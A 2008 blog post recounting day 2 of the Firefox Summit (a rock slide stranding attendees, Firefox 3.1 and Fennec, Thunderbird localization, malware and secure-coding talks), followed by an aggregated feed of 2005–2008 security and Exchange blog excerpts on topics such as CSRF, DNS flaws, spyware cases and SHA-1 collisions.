    The main piece of news for day 2 in the Firefox Summit 2008 is that everyone is now trapped in the small town of Whistler after that a rock slide cut off the highway that connects Whistler with Vancouver. Fortunately, nobody was injured because of this. However, clearing the massive boulders that are blocking the highway will take 5 days according to official sources. Since the summit ends this Thursday, most attendants need to go to the Vancouver Airport on Friday to catch flights to their home countries. The cause of this rock slide is unclear at the moment, but there are people in the summit who are speculating whether a company whose name starts with an 'M' is behind all of this. A bug was filed in Bugzilla to track the issue, and some of the currently-proposed solutions involve riding bears, taking boats, or taking helicopters. In reality however, we will most likely end up going through a different route that takes around 8 hours in a bus.

    Upcoming Mozilla Products

    Back to the events of the summit itself, day 2 started with presentations on the next release of Firefox. Version 3.1 is planned to be released in the 4th quarter of this year. It brings several interesting capabilities to the rendering engine of Firefox, and improves the overall performance of the browser. One important addition is the implementation of the JavaScript Selectors API. This API provides a better and more efficient method of getting elements from the DOM tree. If you are familiar with jQuery or Prototype, you probably know that these libraries provide a function to get a group of DOM elements by matching against a set of CSS selectors. These libraries implement such functionality using JavaScript. Since traversing DOM elements and matching CSS selectors can be expensive operations in JavaScript, it would be much better if this functionality is implemented in the JavaScript engine using native code. And this is exactly what the selectors API is about: provide a standard set of JavaScript functions to get DOM elements using CSS selectors. Firefox 3.1 will contain this API, and even in the current alpha release, the improvements in performance are significant.

    Firefox 3.1 also brings improvements to the canvas element, and provide support for the OGG Theora video technologies. Demos were presented to show off these new features, and the results looked very nice. However, I'm not sure how the adoption is going to be for these features, given that other browsers may or may not support them.

    Next, an interesting and relatively new project called Fennec was presented. Fennec is about bringing Firefox to mobile phones. Even through the project is still in the early stages, there is already a very functional build which was demonstrated.

    Thunderbird 3 Localization

    The next talk I attended was about Thunderbird localization. Thunderbird 3 is currently in alpha stages. Beta 1 is expected in September 2008, Beta 2 is expected in November 2008, and the final release will happen in January 2009. Thunderbird localization now has a new coordinator, Simon Paquet, and he's very enthusiastic about getting new locales (including Arabic). This is an excellent opportunity to finally have an official release of Arabic Thunderbird, and I think a good timing to start importing the current localization to version 3 is around the beta 1 release in September.

    Security and Malware

    Security is very important for a web browser, and one of the selling points for Firefox is the security it offers. I attended two talks on this topic. The first one was a demonstration of the current trends in malware. With malware detection and blocking technologies becoming more advanced, malware authors are finding more sophisticated techniques to trick browsers and/or users to install malware on computers. I haven't used a Windows computer in a very long time, so I wasn't aware of what's going on these days in the world of malware. One interesting attack that was demonstrated was a website that masqueraded as an anti-virus application and tried to convince the user that a virus was found on their computer. Technically, this malicious website consisted of a series of animated images that looked like an anti-virus program starting up, scanning the local hard disk, and then offering the user an executable program claiming that it will clean virus infections, while in reality it will infect the computer with malware. All of this was done in the main window of the browser, without any popups. This is a form of social engineering attack, but it is very difficult to detect and block. How would one detect and block such an attack? This was the open question during the talk, and it resulted in a very interesting discussion on various approaches to handle such issues.

    The second talk was about writing secure software. It went through a series of practices that help in designing and building a secure application. It also used examples from actual vulnerabilities that were found in Firefox, which I found particularly interesting.

    Wrap Up

    Another day, another set of interesting talks. I'm excited about the final day of the summit. Hopefully, it will be as interesting as the previous two days. In addition to the talks, this summit has been a wonderful opportunity to meet interesting people from various parts of the Mozilla project, and from all over the world.

    Twitter Facebook Google Buzz Reddit Hacker News StumbleUpon Digg Delicious

    Read the comments on this post.

    Wed 23 July, 2008

    Channel Image21:43 A poetic approach to Dan’s (And Halvar’s) DNS debacle» Static in the Ether » Security
    With the ongoing smoldering relating to the cross platform cross-vendor flaw in DNS as reported by Dan Kaminsky, Christofer Hoff has put a summary of  the situation together, but as a poem. Its also worth noting that Halvar Flake has stepped up and stated that hes found the bug as well ( so I assume [...]

    Mon 14 July, 2008

    Channel Image22:18 IFIP 2009 Conference CFP» Static in the Ether » Security
    The 24th IFIP International Information Security Conference, has just released its call for papers for the 2009 edidtion to be held in Cyprus May 18-20 next year. Accepted papers will be presented at the conference and published by  Springer. Accepted papers must follow Springer’s guidelines for the IFIP Series, available at  www.springer.com/series/6102 Important dates Submission [...]

    Wed 09 July, 2008

    Channel Image20:46 Quiz: Proposal to amend Same Origin Policy» Palisade Magazine : Application Security Intelligence

    Same origin policy of browser prevents scripts loaded in one domain to access resource from another domain. However, this policy imposes several limitations to Web 2.0 apps and restricts interactivity between sites. A new proposal has been formed by W3C, to incorporate Web 2.0 developer’s demands, by allowing cross site requests. Which among the following is the said proposal?

    1. Configuring Domain Authorization Rules on the application server side
    2. Access Control for Cross-site Requests
    3. Configuring Application level ACL
    Channel Image14:43 Cache Control Directives Demystified» Palisade Magazine : Application Security Intelligence
    Many years ago, HTTP 1.1 introduced specialized Cache Control directives to control the behavior of browser caches and proxy caches. These were a refinement over the HTTP 1.0 headers that programmers were using to control the behavior of caches. Though these directives are several years old, we still see them being used incorrectly. In this article, we explain the meaning and relevance of the most important cache control directives.
    Channel Image14:38 The Payment Application Data Security Standard (PA DSS)» Palisade Magazine : Application Security Intelligence
    PA DSS fills a gap in the more well known PCI DSS standard. Today, we’ll discuss this lesser-known standard. Remember that the biggies of the credit card industry put their heads together and came up with Payment Card Industry Data Security Standard (PCI DSS). Their aim was to protect the “Cardholder’s” data. PCI DSS was first released in 2005 and then revised in October 2006. PCI DSS has a few requirements that talk about securing web applications that deal with cardholder’s data.
    Channel Image11:34 Defend against Reverse Engineering» Palisade Magazine : Application Security Intelligence
    Software reverse engineering is the technique of getting the original source code from the binary. Competitors might use reverse engineering to figure out how you implemented that cool feature. Crackers might use it to see how they can bypass your license policy. Game cheats use reverse engineering, well, to cheat.

    Thu 26 June, 2008

    Channel Image23:22 Torrents and SSH Tunnels» Linux Exposed
    After the collapse of Napster, with places like donkax and the one and only original html suprnova, a brand new...

    Wed 25 June, 2008

    Channel Image04:54 NEW URL FOR HNS RSS FEED: http://feeds.feedburner.com/HelpNetSecurity» Help Net Security - News
    We moved the location of our RSS feed to Feedburner, so please resubscribe to: http://feeds.feedburner.com/HelpNetSecurity. The RSS feed you are currently using won't be updated any more, so do update your RSS subscription to the new feed. The content and updating frequency will stay the same.

    Tue 10 June, 2008

    Channel Image15:30 Quiz: Cross Site Printing» Palisade Magazine : Application Security Intelligence

    What is Cross Site Printing?

    1. A typo for Cross Site Scripting
    2. A new Printing technology from Microsoft
    3. A new attack that prints to your internal printers when you visit a website
    4. None of these
    Channel Image15:00 CSRF - The hidden menace» Palisade Magazine : Application Security Intelligence
    Cross Site Request Forgery (also known as XSRF, CSRF, Sea Surf, Session Riding, and Cross Site Reference Forgery) is an attack that tricks the victim into taking some action on the vulnerable application without the victim’s knowledge. This can happen when the victim visits a webpage that contains a malicious request, which then performs the chosen action on behalf of the victim.
    Channel Image14:30 Mobile Banking - Threats and Mitigation» Palisade Magazine : Application Security Intelligence
    In my previous article, I had explained the two common mobile banking architectures and exchange of information using one of the architectures. In this article, I’ll be explaining the threats observed and an ideal process to overcome these threats. The explanation would be based on the information exchange for the architecture discussed in my previous article. Each phase has the threats mentioned and a secure process to ensure these threats are mitigated.
    Channel Image14:00 URL Redirection Flaw» Palisade Magazine : Application Security Intelligence
    Harry gets an email from his bank stating that he has received some promotion offers so he should click on the link below to avail those offers. Harry ensures that the site is authentic by checking the name of his bank in the URL as he is aware of phishing attacks. He finds it to be a genuine URL of the bank, so he clicks the link. On clicking the link the login page of his bank is displayed to him. He enters his username and password on the login page. He gets an error page saying “The server is unable to process your request”.

    Thu 27 March, 2008

    Channel Image21:52 Preventing Accidental Denial of Service» Linux Exposed
    Linux allows you to set limits on the amount of system resources that users and groups can use. This is...

    Thu 20 March, 2008

    Channel Image01:00 Enhance Security with Port Knocking» Linux Exposed
    In the field of IT systems security, concept of” port knocking” is relatively new. However with the passage of time,...

    Wed 23 January, 2008

    Channel Image03:54 NEW URL FOR HNS RSS FEED: http://feeds.feedburner.com/HelpNetSecurity» Help Net Security - News
    We moved the location of our RSS feed to Feedburner, so please resubscribe to: http://feeds.feedburner.com/HelpNetSecurity. The RSS feed you are currently using won't be updated any more, so do update your RSS subscription to the new feed. The content and updating frequency will stay the same.

    Thu 17 January, 2008

    Channel Image02:54 NEW URL FOR HNS RSS FEED: http://feeds.feedburner.com/HelpNetSecurity» Help Net Security - News
    We moved the location of our RSS feed to Feedburner, so please resubscribe to: http://feeds.feedburner.com/HelpNetSecurity. The RSS feed you are currently using won't be updated any more, so do update your RSS subscription to the new feed. The content and updating frequency will stay the same.

    Thu 22 November, 2007

    Channel Image04:05 I’m back… maybe» Spyware Warrior
    After a year of no blogging, I'm getting itchy fingers again. I'm not making any promises about frequency of blogging, and comments and trackbacks are turned off and will remain that way for now.

    Fri 09 November, 2007

    Channel Image14:58 Le site MySpace d'Alicia Keys piraté» Bienvenue sur le blog Vers et Virus
    Je viens de découvrir ce matin que le site MySpace d'Alicia Keys a de nouveau été piraté. Si vous cherchez à lui envoyer un e-mail en cliquant sur le lien dédié à cet effet, c'est un cheval de Troie qui...

    Thu 08 November, 2007

    Channel Image08:45 Cyber-Jihad ou pas ?» Bienvenue sur le blog Vers et Virus
    Les rumeurs annonçant le déclenchement imminent d’un « cyber jihad » ne sont pas nouvelles. Un mois après le 11 septembre 2001, des pirates Pakistanais déclaraient vouloir mettre à mal divers sites américains ou britanniques. Bien plus tôt déjà, en...

    Wed 24 October, 2007

    Channel Image15:36 A vous de juger !» Bienvenue sur le blog Vers et Virus
    Hier, je cherchais sur Internet quelques informations sur de récentes poursuites menées par la FTC - agence fédérale américaine de régulation en charge de la protection des consommateurs et de la concurrence. Elle met régulièrement en cause des sociétés distributrices...

    Tue 16 October, 2007

    Channel Image10:45 Scénario d’une cyberguerre» Bienvenue sur le blog Vers et Virus
    Sur le site 24heures.ch, il est possible de lire un article très intéressant sur les liens possibles entre certaines cybermafias et services étatiques de leur propre pays. En Russie, c’est le fournisseur d’accès Internet RBN (Russian Business Network) et son...

    Thu 11 October, 2007

    Channel Image19:28 Le roi du spam n’est sûrement pas mort !» Bienvenue sur le blog Vers et Virus
    Depuis plusieurs années nous expliquons que les diverses méthodes bien réelles qu’employaient hier les criminels s’appliquent maintenant à la criminalité virtuelle. Une rumeur venant de Russie semble chercher à nous faire croire qu’un nouveau pas aurait été franchi. Le blog...
    Channel Image13:31 Les pirates ne respectent rien !» Bienvenue sur le blog Vers et Virus
    Dans le but d’implanter des keyloggers et autres renifleurs de mots de passe, les pirates utilisent de plus en plus fréquemment la technique des IFRAME cachées. Ils modifient les pages d’accueil de sites légitimes, populaires, connus ou officiels. Ils y...

    Fri 28 September, 2007

    Channel Image15:21 Question à Club-Internet» Bienvenue sur le blog Vers et Virus
    J’ai sous les yeux un e-mail qui proviendraient du service Abuse de Club-Internet. Une abonnée au service l’a reçue le 20 septembre 2007 et m'appelle à l'aide. Une rapide recherche via Google me montre qu’il circulait déjà en 2005 et...

    Mon 10 September, 2007

    Channel Image09:10 La France à son tour la cible de l'armée chinoise ?» Bienvenue sur le blog Vers et Virus
    Mise à jour du 12 septembre 2007 (Source AFP): Selon une source proche du dossier, parmi les cibles en France figurait le site internet du ministère de la Défense. Mise à jour du 12 septembre 2007 (Source Universal Press Agency):...

    Thu 06 September, 2007

    Channel Image13:50 I’m DEranged, not suicidal!» Bienvenue sur le blog Vers et Virus
    Lundi dernier, VNUnet annonçait que Dan Egerstad, consultant en sécurité et animateur du site DEranged Security avait mis la main sur des données permettant de se connecter à des boites mails de personnels d'ambassades et d'agences gouvernementales (ambassade du Kazakhstan...

    Mon 03 September, 2007

    Channel Image09:44 Attaque de la Bank of India (suite)» Bienvenue sur le blog Vers et Virus
    Vendredi, je vous faisais part de l'attaque que subissait la Banque of India. Pour les curieux, voici ici, le lien vers le blog de Dancho Danchev ; il contient de nombreuses informations intéressantes. Voici d'autre part une vidéo présentant le...

    Fri 15 June, 2007

    Channel Image11:29 Quiz: Safe Authentication Controls» Palisade Magazine : Application Security Intelligence

    Which of the following is/are required as safe authentication controls at login page?

    1. Enable SSL
    2. Define acceptable Inputs
    3. Use Salted Hash technique
    4. Disable password save and AutoComplete/fill-in
    5. All of them
    Channel Image11:27 Common mistakes in two-tier applications» Palisade Magazine : Application Security Intelligence
    In previous articles, we have talked about some of the attack techniques and defenses that are possible with two-tier applications. An important thing to note in two-tier applications is that a thick-client application running on the user’s machine directly connects to the database. This means that local machine can directly connect to the database. In this article, we look at some of the common mistakes made in configuring and developing two-tier applications which can render the database vulnerable to attacks from users.
    Channel Image11:23 Virtualization – the promised land?» Palisade Magazine : Application Security Intelligence
    Someone somewhere is still getting compromised after investing a lot in security. Now there’s something called ‘virtualization’ which seems to be some kind of a promised land – a ‘solution’ to all these security problems. It’s being adopted rapidly across multiple organizations just because its ‘secure’. So what is virtualization? Why is it such a craze? Is it really that secure? Is there no way to compromise it? Are we finally 100% safe? A lot of pertinent questions there – let’s try and answer them, shall we?

    Thu 23 November, 2006

    Channel Image03:20 Rob Martinson, Walt Rines and the FTC - final chapter» Spyware Warrior
    Nearly three years after Rob Martinson hit the internet with SpyWiper, the anti-spyware program from hell that opened CD ROM drives and sent hundreds of users to spyware help forums, the Federal Trade Commission has settled his case, fining him $1.86 million. Martinson's cohort in crime, Walt Rines of ...

    Mon 23 October, 2006

    Channel Image11:12 BOFH not available in feeds» The Register - Odds and Sods: BOFH
    Thanks for your interest in the Bastard Operator from Hell. Simon Travaglia, the author of BOFH, has asked us to remove links to his articles from our RSS feeds. We will not restore the BOFH RSS feeds without his permission.

    Tue 15 August, 2006

    Channel Image02:25 Movieland.com sued by Washington State AG for spyware» Spyware Warrior
    From today's press release: Rob McKenna ATTORNEY GENERAL OF WASHINGTON 1125 Washington Street SE · PO Box 40100 · Olympia WA 98504-0100 FOR IMMEDIATE RELEASE August 14, 2006 Attorney General McKenna Sues Movieland.com and Associates for Spyware SEATTLE – Washington State Attorney General Rob McKenna today announced the filing of Washington’s second ...

    Wed 12 July, 2006

    Channel Image01:37 nUbuntu Competition #002» nUbuntu Blog
    So I have announced a new nUbuntu competition: design the new Fluxbox theme for nUbuntu! You can find details on the main page for the website.

    Tue 04 July, 2006

    Channel Image05:10 161 trackback spams from InterCage/Atrivo IP» Spyware Warrior
    Yesterday I was unpleasantly surprised to find I had 161 blog trackback spams -- all from the same IP address, 69.50.188.35. You can see here that the IP address belongs to InterCage, formerly known as Atrivo. Whois Record OrgName: InterCage, Inc. OrgID: INTER-359 Address: 1955 Monument Blvd. ...
    Channel Image03:10 CastleCops responds to trademark troll Leo Stoller» Spyware Warrior
    Follow up on the story last week about Leo Stoller, well known as a trademark troll, attack on CastleCops over the name "Castle" -- see CastleCops responds to Leo Stoller here. Dear Mr. Stoller: I write you on behalf of my clients Paul Laudanski and Computercops, LLC. I have spoken with my ...

    Fri 07 April, 2006

    Channel Image12:44 nUbuntu - Flight 6 Released» nUbuntu Blog
    So I finally shipped out a version of nUbuntu which I am pretty proud of. I did many of the things I wanted to do, such as change the username and hostname. Included patched drivers for packet injection. Download this release and test it in everyway possible. I also coded a [...]

    Sun 02 April, 2006

    Channel Image16:55 Welcome to the nUbuntu Development Blog» nUbuntu Blog
    I have decided to make a development blog for the development of nUbuntu, where I can write things such as changes, and things which I may change.  I will also write about anything in the security and Linux world which may affect nUbuntu and/or Ubuntu.

    Sun 31 July, 2005

    Channel Image13:56 New netfilter target NFQUEUE» NuFW Community Site
    Harald Welte has announced that he will push to the upcoming 2.6.14 kernel a bunch of new things. In particular, he announces the availability of a new target NFQUEUE.

    Unlike QUEUE this target supports multiple simultaneous queues (65535). This should permit to have NuFW and snot-inline working together.

    One other new feature is libnfnetlink_conntrack which will provide a convenient way to get conntrack event in userpace.

    2.6.14 kernel will thus be the place of a new start in Netfilter public development.

    Mon 25 July, 2005

    Channel Image12:45 NuFW has been ported to powerpc» NuFW Community Site
    NuFW 1.0.11 has been ported to powerpc. All components have been tested on a MAC G3. As there is no problem with 64 bits architecture, nuauth should work on any big endian architectures.

    This release also brings interesting feature such as improvment of nuauth certificate check on nufw side. The -n option adds the capability to check the DN of nuauth certificate against a provided string. Use in conjonction with -k option, it ensures that nuauth presents a certificate signed by the required authority and that this is the wanted certificate because the DN is equal to the one asked in [more ...]

    Wed 13 July, 2005

    Channel Image05:58 NuFW 1.0.10, "Michel Rocard" release» NuFW Community Site
    NuFW 1.0.10 is now available. It corrects a bug in libnuclient which could cause clients to crash on nuauth restart.

    This is the first release since European Parliament said No to the "software patents" directive. As Michel Rocard has played a major role in this victory, we have decided to codename this release "Michel Rocard" as special thanks to him for his involvement against software patents.

    For the record, the 1.0.0 release of NuFW was codenamed "European Parliament, Save Me!" after the Council of Ministers of Europe played the "Common Position" farce.

    Fri 10 June, 2005

    Channel Image05:17 Some News (1.0.7 is out !)» NuFW Community Site
    After a long time of inactivity on the website due to intensive work on NuFW, I add a news to announce one of the last 1.0 release, 1.0.7. It fixes a bug that occurs on some specific glibc (double free problem). The code of 1.0 branch will not evolve much, even if a new release will be available soon because thay will only contain bugfixes.

    The current release will be the base of a new development branch. As work is not yet started, any ideas are welcome !

    Thu 17 March, 2005

    Channel Image07:45 1.0.1 is available» NuFW Community Site
    This release is a maintenance release, it features only two small bug corrections with any impact on stability.

    Wed 09 March, 2005

    Channel Image08:57 NuFW 1.0.0 "European Parliament, Save me!" is out !» NuFW Community Site
    After months of work, the new NuFW is now available. There is almost no change since release candidate 2. Some code cleaning has been done and a configure option has been added.

    This release, codenamed "European Parliament, Save me!", is dedicated to the brave people who will have to continue the fight against software patent in Europe.

    In the same time, INL has released a demo version of a windows client for NuFW.

    Mon 07 March, 2005

    Channel Image20:28 Optimizing Communication and Collaboration workshops get started» Exchange Security

    So, you might have seen Gary or Ed mention this, but now that it's underway I have time to talk about it too. 3sharp is presenting a 10-city roadshow called "Optimizing Communication and Collaboration with Microsoft Technologies". The thrust behind the roadshow is simple: you can get a lot of mileage from Microsoft's investment in communications and collaboration technologies by deploying them in parallel with-- not necessarily as a replacement for-- whatever you're currently using. The structure of the events is simple: if you're a developer, you go to John's excellent class on how to extend Notes apps by having them produce, or consume, data from .NET web services; if you're a technical decision maker, you come hear the Burton Group's forecast on market dynamics in the C&C space, then I get to explain the pieces of MS' collaboration strategy, with copious use of demos.

    Our first event in Dallas this week went really well. My content was well-received; it was obvious to the attendees that we're not suggesting they rip-and-replace their existing infrastructures (well, maybe if you're using OCS). Instead, we're making a solid case for extending their business systems with Microsoft's collaboration and communications platform. Next stop: Waltham! (Personal to Ed Brill: the Chicago show got moved to 4/21, so please adjust your calendar!)

    Channel Image15:37 NetApp and single mailbox recovery» Exchange Security

    In this month's Windows IT Pro, I wrote a buyer's guide article on Exchange recovery tools. This just in from an admin who works for the city government of a large city in Virginia:

    Thanks for putting this article together. I just wanted to let you know we are just about to implement a NetApp solution for Exchange 2003 and without NetApp's Single Mailbox Recovery product, not mentioned as needed in this article, it is impossible to Backup and Recover Individual Mailboxes, Recover Individual Items or Search and Query for Items to be Recovered. I wanted to let you know because their software is expensive and this product is an extra cost.

    Yikes! My apologies for that. When I do a buyers' guide, I write the article itself that accompanies the guide, and I work with the magazine's editors to come up with a list of criteria, plus a list of products that meet those criteria. In this case, the selection criteria included the ability to do brick-level backups, the ability to search and query, and the ability to recover individual items. We don't usually ask vendors to list out all the products, submodules, agents, or other components that have to be installed to meet the criteria. For example, for backup solutions we don't ask whether there's a separate Exchange agent or not. Mail like this makes me think that maybe we should, though, because it's frustrating to buy what you think is a complete solution, only to find out that you have to lay out even more money to get the whole package.

    Mon 28 February, 2005

    Channel Image19:33 Adzilla: worse than Autolink?» Exchange Security

    Lots of discussion about Autolink, which is good. So far, though, I haven't seen very much discussion around Adzilla. Their white paper for service providers describes their services for stripping banner ads (and other ad-related content) and letting the ISP insert its own ads. Yikes. I can't imagine that content providers are going to be too happy about that. Imagine going to CNN.com and seeing locally-inserted ads from your cable modem provider.

    Fri 25 February, 2005

    Channel Image12:23 Fix for Entourage transaction log problem» Exchange Security

    Back in November, I wrote about a problem with Entourage and Exchange transaction logs-- sending a message that was larger than the Exchange global message size limit would cause Entourage to resubmit the message each time it tried to send mail, and this would lead to a flood of transaction log files. There's now a server-side hotfix for this problem: MS KB 889525 (An e-mail message stays in the Outbox and the Exchange Server 2003 transaction log files grow when an Entourage user tries to send a message that exceeds the size limit in Global Settings).

    Thu 17 February, 2005

    Channel Image17:52 Microsoft Security Response Center blog» Exchange Security

    Dang, I never thought I'd see this happen: the Microsoft Security Response Center (MSRC) has a blog. Pretty cool, and definitely good news for MS' ongoing attempts to broaden the degree of security communications.

    Channel Image12:19 Google Toolbar and Autolink: badness afoot» Exchange Security

    You might remember that I ditched the Google Toolbar a couple of months ago. Steve Rubel is reporting on another good reason to do so: the newest version includes a feature called Autolink. Greg Linden explains it very simply: with this feature turned on, Google's modifying web page content to add its own links. For example, addresses are linked to Google Maps pages. Book ISBNs and package tracking numbers are linked too.

    The folks at Google Blogoscoped toss this off with "talk about the Google OS taking over our lives", but you know what? Microsoft tried something similar with their IE support for smart tags. Smart tags are exceptionally useful in Office, because you can easily write your own smart tag code to recognize objects unique to your business (like chemical compound names for a pharmaceutical company). I wrote one that recognizes scripture verses (you know, like "John 3:16"). When MS proposed extending this feature to IE, the furor was incredible. Walt Mossberg, Dave Winer, Dan Gillmor, and a host of other influencers immediately started screaming that Microsoft was taking control over web content and generally acting like an 800-lb gorilla. The EFF even opined that the MS smart tag implementation might be illegal. In fact, here's what Chris Kaminski had to say:

    Even if smart tags don’t violate copyright or deceptive trade laws, they still violate the integrity of the web. Part of the appeal of the web is that it allows anyone to publish anything, to take their thoughts, feelings and opinions and put them before the world with no censors or marketroids in the way. By adding smart tags to web pages, Microsoft is interposing itself between authors and their audience. Microsoft told Walter Mossberg “the feature will spare users from ‘under-linked’ sites.” Microsoft is in effect deciding how authors should write, and how developers should build, websites.

    Worse, Microsoft’s decisions may be at odds with the intent of the site’s author or developer. If an Internet Explorer 6 user visits Travelocity and looks at a page with information on visiting Nice, France, the smart tag that aggravated Thurrott will link the word “Nice” to Microsoft’s Expedia site. With smart tags, Microsoft is able to insert their ads right into competitors’ sites.

    Microsoft is crossing the Rubicon of journalistic and artistic integrity. Editors and authors no longer have final authority over what their sites say; Microsoft and its partners do. For a preview of what the web may look like for Internet Explorer 6 users who also have Office XP or Windows XP installed, take a look at InteractiveWeek’s Connie Guglielmo’s preview. With smart tags, Microsoft is effectively extending its role from being a supplier of tools people use to view content to being the executive editor and creative director of every site on the web.

    So, check that out: Kaminski accuses Microsoft of "deciding how authors should write", "insert[ing] their ads right into competitors' sites", and becoming "the executive editor and creative director of every site on the web". He left out barratry and mopery and dopery in the spaceways, but that's still a pretty damning list.

    Now Google's doing the same thing. Will we see the same reaction?

    My guess is "no". Google's widely publicized mantra of "don't be evil" is increasingly often being used to excuse behavior for which Microsoft, Oracle, or IBM would be roundly condemned. This is just the latest such instance. Don't get me wrong: as a user, I think Autolink could potentially be a useful feature (but then I thought the same thing about smart tag support in IE). As a web content provider, I'm not comfortable with the idea that another entity (which may not have my best interests at heart) is modifying my content before someone else sees it. If Microsoft was wrong then, so Google is wrong now.

    SearchEngineWatch says "the commercial possibilities are massive"-- I'd have to agree. My somewhat cynical guess, though, is that , and that raises the question of whether it's OK for Google to make money by modifying other people's web content. My guess would be "not so much"-- look back at the Kaminski quote and see the part about ad insertion again. On the other hand, I see that Dave Winer is labeling this as "a line they must not cross"-- an encouraging early sign.

    Update: Adam Gaffin points to this article, pointing out that I have Google ads enabled. True. One prominent difference, of course, is that I get to choose whether ads appear on my page or not; I have some reasonable control over the ads' appearance, and I could filter out competitors if I wanted to. Autolink doesn't provide any of these features, except that it allows you to disable it. If I'm an Amazon affiliate, let's say, how do I stop Autolink from doing something nasty to Amazon links on my page? Sure, it might not do that now, but as any competitive strategist knows, you judge competitors by their capabilities, not by their intentions.

    Wed 16 February, 2005

    Channel Image17:11 Adomo's DEMO appearance» Exchange Security

    The Weblogs Inc folks covered Adomo's unveiling here (including a picture that's just begging for a caption). I suggested that the Adomo folks contact Robert Scoble before the show; their product is a natural for discussion on his blog, since it's a) MS-centric b) built with .NET and c) very, very cool. I don't know if they did, and now he's offline. However, he gave them (and everyone else) the same advice.

    Channel Image16:33 SHA-1 broken» Exchange Security

    Bruce Schneier is reporting that the SHA-1 hash algorithm has been broken:

    The research team of Xiaoyun Wang, Yiqun Lisa Yin, and Hongbo Yu (mostly from Shandong University in China) have been quietly circulating a paper describing their results:

    • collisions in the the full SHA-1 in 2**69 hash operations, much less than the brute-force attack of 2**80 operations based on the hash length.
    • collisions in SHA-0 in 2**39 operations.
    • collisions in 58-round SHA-1 in 2**33 operations.

    This attack builds on previous attacks on SHA-0 and SHA-1, and is a major, major cryptanalytic result. It pretty much puts a bullet into SHA-1 as a hash function for digital signatures (although it doesn't affect applications such as HMAC where collisions aren't important).

    Channel Image02:52 NuFW 1.0-rc1 is out !» NuFW Community Site
    This release is the first of a new stable branch, which performs encryption of all flows : nufw-nuauth flows as well as client-nuauth ones. The cache system is now considered stable and tested, and greatly improves performances, compared to the older 0.8.

    A big work has been done since 0.9.6 :
    A major code cleaning and testing effort has been performed on the whole project and this has lead to correction of some major bugs (in particular on AMD64 architecture) as well as to new features such as multiuser client packet support (optimisation for multiusers system).

    As usual you can download it [more ...]

    Mon 14 February, 2005

    Channel Image12:45 Nokia licenses Exchange ActiveSync and Windows Media» Exchange Security

    Now this is a surprise, and a pleasant one. Nokia announced that they're licensing Exchange ActiveSync for their Series 60 and Series 80-based phones. This is excellent news for the Exchange team; clearly their effort to get EAS more widely deployed is bearing fruit. (Nokia also licensed Flash.. just what I want on my phone, not.) Interestingly, the WIndows Mobile team has been busy at 3GSM World too; they announced that Flextronics, a large original device manufacturer (ODM), will be building "Peabody", a new, lower-cost, reference platform for Windows Mobile devices. It should be interesting to see how this plays out.

    Update: it turns out that Nokia is also licensing a bunch of Windows Media technologies, including Windows Media DRM and the Media Transfer Protocol. Take that, Apple and your not-yet-shipping Motorola iTunes phone!

    Channel Image12:26 Adomo: integated voicemail for Exchange» Exchange Security

    Today a startup named Adomo is launching their new product, Adomo Voice Messaging. They briefed me on it a month or so ago, and I've been eagerly waiting for today (the start of the DEMO 2005 conference) for the embargo to lift so I could talk about it. What they're essentially trying to do is build a comprehensive unified messaging (UM) solution that uses Exchange not just as a message store (like Cisco's Unity) but as the communications backbone. I think they're on the right track, taking what I privately label the CommVault approach: they're leveraging Exchange as much as possible, instead of building a product and trying to make it work, not very well, with multiple back ends.

    The Adomo system has three parts: an appliance (running their own *NIX variant, I forget which-- maybe FreeBSD?) that handles up to 36 ports from the PBX, a connector that ties the appliance to the Exchange message store, and a really slick speech-based auto-attendant. You can chain appliances to use more than 36 ports, and Adomo's literature shows smaller 12- and 24-port appliances being used in remote offices. Adomo claims that a single 36-port appliance is enough to serve between 1800 and 3600 users, depending on usage; they're purposefully targeting organizations with more than 500 users. The appliance compresses incoming messages using the GSM codec (which means that you can listen to messages on pretty much any Windows, Mac OS X, or Linux machine-- the codec is ubiquitous, unlike Cisco's ACELP implementation) and sends them to the Exchange connector.

    The Exchange connector is where the action happens: incoming messages are directed to the user's mailbox, where they appear as regular email messages. This is particularly important because it allows you to deploy their solution without any desktop changes: there are no required plugins or Outlook bits to add, and VM attachments are available on any device that can handle email attachments (including handhelds, OWA, and so on). Messages are delivered using an Exchange form that includes buttons that let you play your VM on your phone, call the sender, and take other appropriate actions; Adomo has promised tighter integration with Outlook for future versions, but the existing integration is pretty darn good.

    One of Adomo's big selling points is that you don't have to touch the Exchange server or Active Directory to implement their product. You only need one connector per Exchange organization. The connector doesn't have to be on an Exchange server, and there are no AD schema changes required. You provision user accounts for voicemail by specifying the associated phone numbers, so there's no need for a separate user management tool. Adomo hasn't said which AD attributes they use, but their literature does claim that you can do all the provisioning through AD Users and Computers or through scripts.

    Messages appear with Caller ID data, and the connector is smart enough to match that data against the user's Contacts folder so that messages appear with the correct sender information. That makes it easy to prioritize and handle VMs (either manually or with rules) in the same way you would any other email. In addition to the ubiquitous "message waiting" light, the connector can send SMS messages to a mobile phone or alerts (including the Caller ID number in the subject line) to BlackBerry or other non-audio-capable devices.

    It's hard to do the auto-attendant justice in this form, but I'll try. When you call in, the attendant answers and plays its recorded greeting. You can speak a name at any time, and their speech recognizer will attempt to find the name in the GAL (with conflict resolution, so it can ask the user which John Smith ("John Smith in Sales, or John Smith in Engineering?") to connect to based on OU, domain, or group membership. This in itself is very cool; the cooler part is that the attendant has access to a wealth of user-specific data, including your schedule and presence data from LCS. Imagine being able to set a rule that says "if my wife calls on her cell phone, IM me to tell me; otherwise, dump all incoming calls to voicemail". From a user perspective, imagine calling a contact and having the attendant tell you "Jane's in a meeting until 3pm Central; do you want me to notify her that you're calling?" (based, of course, on Jane's decision to trust you with that information as a contact in her Contacts folder). There are almost limitless possibilities for future expansion here, particularly given that the Adomo solution can be used with SIP products (conveniently including LCS 2005).

    Of course, given Adomo's target market focus, their solution won't work for everyone. First, it requires Exchange 2003. Second, they haven't released pricing data (at least to me) but since their focus is on 500-plus seat organizations, it likely won't be cheap. (One interesting note: Adomo's pitch talks about the benefits of their product for organizations that sell hosted Exchange services-- this could potentially be a nice revenue sweetener for hosting companies). However, in terms of functionality, their nearest competitor is the Wildfire service, which (last I checked) was $70-150/month/user-- so they've definitely got some pricing maneuvering room. I think their product will be successful, but I'm sure it will be interesting to see how Microsoft's announced UM support in Exchange 12 plays against Adomo's solution, which now has a year or two to get traction before E12 ships.

    Sun 13 February, 2005

    Channel Image12:27 NuFW 1.0-rc1 will be publish next week» NuFW Community Site
    This is a announcement of the coming availability of NuFW 1.0-rc1. This first release candidate does not have new killing features but it is the result of an intensive test campaign that has been done by NuFW core team. This release has shown good results in term of stability and performances.

    If no critical bugs are found, this will leads to the 1.0 release in the next weeks.

    Tue 08 February, 2005

